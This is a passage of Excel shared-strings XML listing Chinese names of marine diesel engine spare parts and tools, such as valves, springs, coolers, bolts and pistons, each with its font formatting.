      </rPr>
      <t>端片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丹麦语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁阀远程起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>碳刷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按钮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧（右旋）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>微动开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块传动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸，止动活塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横挡板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧（外部）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧（内部）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/4"</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水排泄（量）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件，精加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>嵌入式注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油板式冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却器组合</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闷头塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜环垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>马达接触器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>埋头螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡块螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡块上紧测量仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>强制滑油布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体的再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹齿形角</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支座轴承的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>嵌入式衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀流量检查工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环链葫芦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊索横板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端垫螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端块衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转轴毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管板，端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油供给单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，推拉杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>项目设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，安全阀装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，示功阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块抽出器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，螺钉和垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆萃取器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复杆总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复杆安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮，液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆，电子仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖密封工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错位连锁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆，电子设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错位面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
